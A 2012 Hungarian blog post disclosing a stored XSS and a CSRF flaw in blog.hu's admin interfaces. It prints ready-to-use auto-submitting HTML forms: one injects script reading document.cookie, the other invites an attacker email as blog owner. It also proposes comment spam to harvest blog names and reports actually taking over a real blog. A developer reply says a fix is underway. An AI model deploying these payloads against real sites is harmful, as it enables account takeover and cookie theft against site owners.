Blog.hu XSS / CSRF

február 27th, 2012 | 3 comments | Hall of shame

Eltelt egy kis idő az utolsó bejegyzésem óta mivel mostanság inkább Offline dolgokkal foglalkozom (GSM és Arduino) de ma eszembe jutott a blog.hu és hogy van egy új admin felületük, gondoltam megnézem hátha találok valami szembeötlőt, és hát találtam is.

Egy korábbi bejegyzésben (http://0xff.org/poc/bxxx-hu/ Sep 28, 2011) már írtam egy BlindSQL Injection hibáról a “régi” admin felületen de mivel a hibát még nem javították ki ezért nem nyilvános a bejegyzés viszont az akkor talált XSS rést most megosztom.

Eljátszódtam a gondolattal, hogy milyen is lenne ha írnék egy “worm”-ot (talán nem ez a legjobb szó rá), de letettem az ötletről.

Mind a XSS mind a CSRF csak belépett, admin joggal rendelkező felhasználóval működik.

Régi admin Permanens XSS :

<html>
<body>
<form name="blog" action="http://blog.hu/admin/blogs/presentation/mobile" method="post">
<input type="hidden" name="action" value="mobile_custom_color" />
<input type="hidden" name="custom_color" value="on" />
<input type="hidden" name="custom_color_code" value="BAE3E2'); alert(document.cookie+' ~0xFF~ " />
</form>

<script type="text/javascript">
 document.forms["blog"].submit();
</script>

</body>
<html>

Demó : http://0xff.org/res/dhtml/blog.hu/xss.blog.hu.html

Új admin felület CSRF avagy “sudo make me admin”

<html>
<head>
</head>

<body>
<form name="blog" action="http://[BLOG_NEVE].blog.hu/admin/settings/invite" method="post">
    <input type="hidden"  name="email" value="blog.hu@0xff.org"><br />
    <input type="hidden"  name="role" value="owner"><br />
</form>

<script type="text/javascript">
 document.forms["blog"].submit();
</script>


<body>
</html>

Annyi szépséghibája van a dolognak, hogy szükséges a blog neve, de szerintem bíztosan ki lehet deríteni. A legegyszerűbb megoldás az lenne hogy megszórni a blogokat egy kis “spam”-el comment és/vagy Linkback amit előbb utóbb az admin is megnéz és akkor a referrer-ben benne van a blog neve.

Demo : http://0xff.org/res/dhtml/blog.hu/csrf.blog.hu.php?blog=[BLOG]&email=[EMAIL]

Amennyire egyszerű ez a CSRF annyira hatásos, a megadott e-mail címre küld egy admin meghívót :D

Update:
buhera.blog.hu Owned : http://buhera.blog.hu/2012/02/27/buherablog_0wned

3 Comments

  1. Szia 0xFF!

    Csináltam egy hotfixet gyorsan a CSRF-re, holnap megy ki a rendes javítás. Régi admint reggel személyesen lövöm le.

    üdv,
    Dávid

  2. superpocok

    Egyszerű és nagyszerű :D
    Nevettem egy jót. Köszi. Főleg buherátor barátunkon… kár lett volna kihagyni:)))

Trackbacks for this post

  1. BITLOG infotech hírek » BuheraBlog 0wned

Leave a Comment